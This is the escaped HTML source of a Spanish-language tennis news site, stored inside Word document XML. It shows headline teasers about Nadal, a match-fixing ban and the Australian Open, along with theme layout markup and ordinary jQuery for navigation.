    <w:p w14:paraId="0791350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src="http://todosobretenis.com/wp-content/uploads/2016/05/WhatsApp-Image-2020-03-19-at-03.00.30-400x240.jpeg" class="mvp-reg-img wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2016/05/WhatsApp-Image-2020-03-19-at-03.00.30-400x240.jpeg 400w, http://todosobretenis.com/wp-content/uploads/2016/05/WhatsApp-Image-2020-03-19-at-03.00.30-1000x600.jpeg 1000w, http://todosobretenis.com/wp-content/uploads/2016/05/WhatsApp-Image-2020-03-19-at-03.00.30-590x354.jpeg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src="http://todosobretenis.com/wp-content/uploads/2016/05/WhatsApp-Image-2020-03-19-at-03.00.30-80x80.jpeg" class="mvp-mob-img wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2016/05/WhatsApp-Image-2020-03-19-at-03.00.30-80x80.jpeg 80w, http://todosobretenis.com/wp-content/uploads/2016/05/WhatsApp-Image-2020-03-19-at-03.00.30-150x150.jpeg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&lt;/div&gt;&lt;!--mvp-flex-story-img---&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68AB69E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class="mvp-flex-story-in"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130A135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class="mvp-flex-story-text left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0494BD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59303FB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relative"&gt;Tenis adaptado&lt;/span&gt;&lt;span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B09478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1E096C5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class="mvp-stand-title"&gt;La primera experiencia de un coach entrenando a un tenista de tenis adaptado&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8E3A3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&lt;p&gt;Martin Roca cuenta cÃ³mo fue la experiencia de entrenar a un jugador de tenis adaptado&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5B5B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&lt;/div&gt;&lt;!--mvp-flex-story-text---&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E212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&lt;/div&gt;&lt;!--mvp-flex-story-in--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE6C15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&lt;/div&gt;&lt;!--mvp-flex-story-out--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6294EF3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&lt;/div&gt;&lt;!--mvp-flex-story--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06AAEAE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60351E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&lt;/div&gt;&lt;!--mvp-flex-story-wrap--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286AC40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&lt;/div&gt;&lt;!--mvp-flex-side-in--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EFB6C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class="mvp-flex-side-wrap left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6143055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class="mvp-flex-ad left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6331DFA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class="mvp-ad-label"&gt;Anuncio &lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5D26B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&lt;strong&gt;&lt;a href="www.terromekioscos.com.ar"&gt;&lt;img class="aligncenter wp-image-31118 size-large" src="http://todosobretenis.com/wp-content/uploads/2021/03/GRAF-6-FEED-1024x1024.jpg" alt="" width="300" height="250" /&gt;&lt;/a&gt;&lt;/strong&gt;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&lt;/div&gt;&lt;!--mvp-flex-ad--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA209C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&lt;/div&gt;&lt;!--mvp-flex-side-wrap--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565ECB7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&lt;/div&gt;&lt;!--mvp-flex-side-out--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB0BE2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&lt;/div&gt;&lt;!--mvp-widget-flex-wrap--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507C4FF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4C14702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&lt;/div&gt;&lt;/section&gt;&lt;section id="mvp_home_feat2_widget-7" class="mvp-widget-home left relative mvp_home_feat2_widget"&gt;&lt;div class="mvp-main-box"&gt;&lt;div class="mvp-widget-home-head"&gt;&lt;h4 class="mvp-widget-home-title"&gt;&lt;span class="mvp-widget-home-title"&gt;POR SI TE LO PERDISTE&lt;/span&gt;&lt;/h4&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471E5AB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class="mvp-widget-feat2-wrap left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728ABED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class="mvp-widget-feat2-out left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC876A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class="mvp-widget-feat2-in"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587CCD3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class="mvp-widget-feat2-main left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D8B98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class="mvp-widget-feat2-left left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03532D8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href="http://todosobretenis.com/nadal-me-pone-triste-la-operacion-de-del-potro/" rel="bookmark"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2905EB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class="mvp-widget-feat2-left-cont left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6337092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class="mvp-feat1-feat-img left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51671C0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width="560" height="600" src="http://todosobretenis.com/wp-content/uploads/2020/01/los-dos-560x600.jpg" class="attachment-mvp-port-thumb size-mvp-port-thumb wp-post-image" alt=""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&lt;/div&gt;&lt;!--mvp-feat1-feat-img--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAAD98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class="mvp-feat1-feat-text left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64674D6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6A1262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relative"&gt;Declaraciones&lt;/span&gt;&lt;span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5E683D7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600B9F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 class="mvp-stand-title"&gt;Nadal: â€œMe pone triste la operaciÃ³n de Del Potroâ€&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F3E3F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&lt;p&gt;Luego de su victoria frente a Nick Kyrgios, el espaÃ±ol hablÃ³ sobre el tenista argentino y de su vuelta a...&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7C95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&lt;/div&gt;&lt;!--mvp-feat1-feat-text--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69917FB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&lt;/div&gt;&lt;!--mvp-widget-feat2-left-cont--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDD73D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03B0AE5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&lt;/div&gt;&lt;!--mvp-widget-feat2-left--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1DB0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class="mvp-widget-feat2-right left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1A369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href="http://todosobretenis.com/suspendieron-de-por-vida-a-joao-souza-por-el-arreglo-de-partidos/" rel="bookmark"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AAD104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class="mvp-widget-feat2-right-cont left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5744D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class="mvp-widget-feat2-right-img left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF806E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src="http://todosobretenis.com/wp-content/uploads/2020/01/souzaa-400x240.jpeg" class="mvp-reg-img lazy wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2020/01/souzaa-400x240.jpeg 400w, http://todosobretenis.com/wp-content/uploads/2020/01/souzaa-1000x600.jpeg 1000w, http://todosobretenis.com/wp-content/uploads/2020/01/souzaa-590x354.jpeg 590w"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src="http://todosobretenis.com/wp-content/uploads/2020/01/souzaa-80x80.jpeg" class="mvp-mob-img lazy wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2020/01/souzaa-80x80.jpeg 80w, http://todosobretenis.com/wp-content/uploads/2020/01/souzaa-150x150.jpeg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&lt;/div&gt;&lt;!--mvp-widget-feat2-right-img--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282CB05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class="mvp-widget-feat2-right-text left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5576DCB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4BFD44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relative"&gt;Noticias&lt;/span&gt;&lt;span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4E3100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8E67A9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&lt;h2&gt;Suspendieron de por vida a Joao Souza por el arreglo de partidos&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFAF30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&lt;/div&gt;&lt;!--mvp-widget-feat2-right-text--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52499E5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&lt;/div&gt;&lt;!--mvp-widget-feat2-right-cont--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4C712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89DE78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href="http://todosobretenis.com/la-atp-probara-la-revision-electronica-en-arcilla/" rel="bookmark"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC89B6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class="mvp-widget-feat2-right-cont left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FFC64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class="mvp-widget-feat2-right-img left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6704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width="400" height="240" src="http://todosobretenis.com/wp-content/uploads/2020/01/rio-de-janeiro-2020-centre-court-400x240.jpg" class="mvp-reg-img lazy wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2020/01/rio-de-janeiro-2020-centre-court-400x240.jpg 400w, http://todosobretenis.com/wp-content/uploads/2020/01/rio-de-janeiro-2020-centre-court-300x180.jpg 300w, http://todosobretenis.com/wp-content/uploads/2020/01/rio-de-janeiro-2020-centre-court-768x461.jpg 768w, http://todosobretenis.com/wp-content/uploads/2020/01/rio-de-janeiro-2020-centre-court-590x354.jpg 590w, http://todosobretenis.com/wp-content/uploads/2020/01/rio-de-janeiro-2020-centre-court.jpg 1000w" sizes="(max-width: 400px) 100vw, 400px"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src="http://todosobretenis.com/wp-content/uploads/2020/01/rio-de-janeiro-2020-centre-court-80x80.jpg" class="mvp-mob-img lazy wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2020/01/rio-de-janeiro-2020-centre-court-80x80.jpg 80w, http://todosobretenis.com/wp-content/uploads/2020/01/rio-de-janeiro-2020-centre-court-150x150.jpg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&lt;/div&gt;&lt;!--mvp-widget-feat2-right-img--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541E2F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class="mvp-widget-feat2-right-text left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2522A63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3D50630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relative"&gt;Noticias&lt;/span&gt;&lt;span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4FF2E5F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346D354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&lt;h2&gt;La ATP probarÃ¡ la revisiÃ³n electrÃ³nica en arcilla&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA2E5D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&lt;/div&gt;&lt;!--mvp-widget-feat2-right-text--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7058A0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&lt;/div&gt;&lt;!--mvp-widget-feat2-right-cont--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13248D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7C4CE3B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&lt;/div&gt;&lt;!--mvp-widget-feat2-right--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC9A8A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&lt;/div&gt;&lt;!--mvp-widget-feat2-main--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F588E3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&lt;/div&gt;&lt;!--mvp-widget-feat2-in--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1355F6D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class="mvp-widget-feat2-side left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EB0B1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class="mvp-widget-feat2-side-ad left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1556A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class="mvp-ad-label"&gt;Anuncio &lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAA5B0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&lt;strong&gt;&lt;a href="www.terromekioscos.com.ar"&gt;&lt;img class="aligncenter wp-image-31118 size-large" src="http://todosobretenis.com/wp-content/uploads/2021/03/GRAF-6-FEED-1024x1024.jpg" alt="" width="300" height="250" /&gt;&lt;/a&gt;&lt;/strong&gt;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&lt;/div&gt;&lt;!--mvp-widget-feat2-side-ad--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E73CA6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class="mvp-widget-feat2-side-list left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B28B29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 left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2358880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href="http://todosobretenis.com/farah-suspendido-provisionalmente-por-la-itf/" rel="bookmark"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166826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34A741A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0F8E6F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66696D4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src="http://todosobretenis.com/wp-content/uploads/2020/01/FARAH-80x80.jpg" class="attachment-mvp-small-thumb size-mvp-small-thumb wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2020/01/FARAH-80x80.jpg 80w, http://todosobretenis.com/wp-content/uploads/2020/01/FARAH-150x150.jpg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759333B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2B348A7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19AFCE1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088330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relative"&gt;Noticias&lt;/span&gt;&lt;span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2BDB77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1D92A43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&lt;h2&gt;Farah, suspendido provisionalmente por la ITF&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB1C12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474B7E0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362DFD3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1D576BA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3DC92B7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6994AF7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href="http://todosobretenis.com/trungelliti-no-se-si-es-para-aplaudir-lo-de-kicker-hace-tiempo-que-era-el-momento-de-aceptar-los-errores-en-vez-de-ensuciar-gente/" rel="bookmark"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081B8BF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23D6787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75D894B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10CD493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src="http://todosobretenis.com/wp-content/uploads/2020/01/trungelliti-es1-articleLarge-80x80.jpg" class="attachment-mvp-small-thumb size-mvp-small-thumb wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2020/01/trungelliti-es1-articleLarge-80x80.jpg 80w, http://todosobretenis.com/wp-content/uploads/2020/01/trungelliti-es1-articleLarge-150x150.jpg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2E7F2AE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5F9D00C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2532F87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2F725C2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relative"&gt;Declaraciones&lt;/span&gt;&lt;span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5145E7C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01D8E20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&lt;h2&gt;Trungelliti: &amp;#8220;No se si es para aplaudir lo de Kicker. Hace tiempo que era el momento de aceptar los errores en vez de ensuciar gente&amp;#8221;.&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78641D9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33D08ED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63049C4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42EB54C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591F8C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2A6EB3B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href="http://todosobretenis.com/record-de-premios-en-el-australian-open-2020/" rel="bookmark"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F08BB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class="mvp-feat1-list-cont left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2C62A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class="mvp-feat1-list-out relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D0F6E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class="mvp-feat1-list-img left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669E021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&lt;img width="80" height="80" src="http://todosobretenis.com/wp-content/uploads/2020/01/trofeo-80x80.jpg" class="attachment-mvp-small-thumb size-mvp-small-thumb wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2020/01/trofeo-80x80.jpg 80w, http://todosobretenis.com/wp-content/uploads/2020/01/trofeo-150x150.jpg 150w" sizes="(max-width: 80px) 100vw, 80px" /&gt;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&lt;/div&gt;&lt;!--mvp-feat1-list-img--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C23EC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class="mvp-feat1-list-in"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F075F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class="mvp-feat1-list-text"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EAA51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class="mvp-cat-date-wrap left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCBBF0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class="mvp-cd-cat left relative"&gt;Australian Open&lt;/span&gt;&lt;span class="mvp-cd-date left relative"&gt;dÃ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softHyphen/>
        <w:t>as atras&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166BD2A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&lt;/div&gt;&lt;!--mvp-cat-date-wrap--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417BF34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&lt;h2&gt;RÃ©cord de premios en el Australian Open 2020&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2FE81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&lt;/div&gt;&lt;!--mvp-feat1-list-text--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E8A9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&lt;/div&gt;&lt;!--mvp-feat1-list-in--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03AD35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&lt;/div&gt;&lt;!--mvp-feat1-list-out--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F79E0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&lt;/div&gt;&lt;!--mvp-feat1-list-cont--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04761E0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4269CD5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&lt;/div&gt;&lt;!--mvp-feat1-list--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF6D57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href="http://todosobretenis.com/tag/porsiteloperdiste/"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B695C0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class="mvp-widget-feat2-side-more-but left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FB575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&lt;span class="mvp-widget-feat2-side-more"&gt;MÃ¡s POR SI TE LO PERDISTE&lt;/span&gt;&lt;i class="fa fa-long-arrow-right" aria-hidden="true"&gt;&lt;/i&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C53BC9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&lt;/div&gt;&lt;!--mvp-widget-feat2-side-more-but--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5376C7F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&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE24A2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&lt;/div&gt;&lt;!--mvp-widget-feat2-side-list--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4300C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&lt;/div&gt;&lt;!--mvp-widget-feat2-side--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1781808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&lt;/div&gt;&lt;!--mvp-widget-feat2-out--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2C71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&lt;/div&gt;&lt;!--mvp-widget-feat2-wrap--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A03113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12B7D24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&lt;/div&gt;&lt;/section&gt;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&lt;/div&gt;&lt;!--mvp-home-widget-wrap--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3109E3B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&lt;/div&gt;&lt;!--mvp-main-body-wrap--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63712CE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&lt;footer id="mvp-foot-wrap" class="left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D59DA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id="mvp-foot-top" class="left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290EA8F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class="mvp-main-box"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3274477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id="mvp-foot-logo" class="left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E6B49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&lt;a href="http://todosobretenis.com/"&gt;&lt;img src="http://todosobretenis.com/wp-content/uploads/2019/01/TST-3-1.png" alt="Todo Sobre Tenis" data-rjs="2" /&gt;&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAAD13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&lt;/div&gt;&lt;!--mvp-foot-logo--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0628BB9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id="mvp-foot-soc" class="left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B25C7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&lt;ul class="mvp-foot-soc-list left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C92005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&lt;li&gt;&lt;a href="http://facebook.com/todosobretenis" target="_blank" class="fa fa-facebook fa-2"&gt;&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1823216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&lt;li&gt;&lt;a href="https://twitter.com/Tsobretenis" target="_blank" class="fa fa-twitter fa-2"&gt;&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C46D0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&lt;li&gt;&lt;a href="https://www.instagram.com/todosobretenis/?hl=es" target="_blank" class="fa fa-instagram fa-2"&gt;&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0897FA9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&lt;/ul&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49744FA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&lt;/div&gt;&lt;!--mvp-foot-soc--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E20EF1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id="mvp-foot-menu-wrap" class="left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208055D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id="mvp-foot-menu" class="left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766ACE5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&lt;/div&gt;&lt;!--mvp-foot-menu--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7A84E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&lt;/div&gt;&lt;!--mvp-foot-menu-wrap--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494A16E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&lt;/div&gt;&lt;!--mvp-main-box--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5D1BD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&lt;/div&gt;&lt;!--mvp-foot-top--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2102005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id="mvp-foot-bot" class="left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D3DF6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class="mvp-main-box"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2E251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&lt;div id="mvp-foot-copy" class="left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1850F5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&lt;p&gt;2012-2020 Todo Sobre Tenis - Todos los derechos reservados.&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DED1E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&lt;/div&gt;&lt;!--mvp-foot-copy--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23266ED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&lt;/div&gt;&lt;!--mvp-main-box--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147720A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&lt;/div&gt;&lt;!--mvp-foot-bot--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392D35E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&lt;/footer&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1679F3C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&lt;/div&gt;&lt;!--mvp-site-main--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8AD63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&lt;/div&gt;&lt;!--mvp-site-wall--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C49C90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&lt;/div&gt;&lt;!--mvp-site--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B2472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&lt;div class="mvp-fly-top back-to-top"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036121D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&lt;i class="fa fa-angle-up fa-3"&gt;&lt;/i&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405C6A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&lt;/div&gt;&lt;!--mvp-fly-top--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347D2CE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&lt;div class="mvp-fly-fade mvp-fly-but-click"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41307AB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&lt;/div&gt;&lt;!--mvp-fly-fade--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE0FF1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 src='http://todosobretenis.com/wp-content/themes/zox-news/js/mvpcustom.js?ver=4.9.18'&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A8220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type='text/javascript'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2E316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4929DB2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jQuery(document).ready(function($) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C8C53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$(window).load(function(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6241A12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var leaderHeight = $("#mvp-leader-wrap").outerHeight();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACFF91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var logoHeight = $("#mvp-main-nav-top").outerHeight();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67928E8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var botHeight = $("#mvp-main-nav-bot").outerHeight();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C721E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var navHeight = $("#mvp-main-head-wrap").outerHeight();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FC24A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var headerHeight = navHeight + leaderHeight;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2416C3A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var aboveNav = leaderHeight + logoHeight;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185CC53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var totalHeight = logoHeight + botHeight;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A06D03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var previousScroll = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326F4DF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$(window).scroll(function(event){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730DB63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var scroll = $(this).scrollTop();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7015625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if ($(window).scrollTop() &gt; aboveNav){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6B246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$("#mvp-main-nav-top").addClass("mvp-nav-small");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5FB00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$("#mvp-main-nav-bot").css("margin-top", logoHeight );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF0A9B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 else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AC0C5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$("#mvp-main-nav-top").removeClass("mvp-nav-small");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3762B2F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$("#mvp-main-nav-bot").css("margin-top","0");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607942A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26FF5AC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if ($(window).scrollTop() &gt; headerHeight){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4AA17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$("#mvp-main-nav-top").addClass("mvp-fixed");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23223BC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$("#mvp-main-nav-bot").addClass("mvp-fixed1");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735B6B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$("#mvp-main-body-wrap").css("margin-top", totalHeight );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152F48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$("#mvp-main-nav-top").addClass("mvp-fixed-shadow");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FF274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$(".mvp-fly-top").addClass("mvp-to-top");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4491E73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if(scroll &lt; previousScroll) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C610E5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$("#mvp-main-nav-bot").addClass("mvp-fixed2");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226EF64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$("#mvp-main-nav-top").removeClass("mvp-fixed-shadow");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EA7B6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 else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8DCD9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$("#mvp-main-nav-bot").removeClass("mvp-fixed2");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E147D7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$("#mvp-main-nav-top").addClass("mvp-fixed-shadow");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531DD16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39F7962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 else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A48AE1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$("#mvp-main-nav-top").removeClass("mvp-fixed");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014C54B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$("#mvp-main-nav-bot").removeClass("mvp-fixed1");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685BDE6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$("#mvp-main-nav-bot").removeClass("mvp-fixed2");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277100E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$("#mvp-main-body-wrap").css("margin-top","0");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353C3BD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$("#mvp-main-nav-top").removeClass("mvp-fixed-shadow");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CF869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$(".mvp-fly-top").removeClass("mvp-to-top");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6BE5A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1C56802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previousScroll = scroll;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D801AE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7694367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2EF9DEA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42DE7BE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</w:p>
    <w:p w14:paraId="6C44870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1BFD6BF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jQuery(document).ready(function($) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6423BAC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// Mobile Social Buttons More</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C101D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$(window).load(function(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6F782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$(".mvp-soc-mob-right").on("click", function(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B60759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$("#mvp-soc-mob-wrap").toggleClass("mvp-soc-mob-more");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8BCF0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44927A6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426F0EC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39977D3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</w:p>
    <w:p w14:paraId="03AC011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78B2EC8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jQuery(document).ready(function($) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0329E09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$(".menu-item-has-children a").click(function(event){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78992AE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event.stopPropagation();</w:t>
      </w:r>
    </w:p>
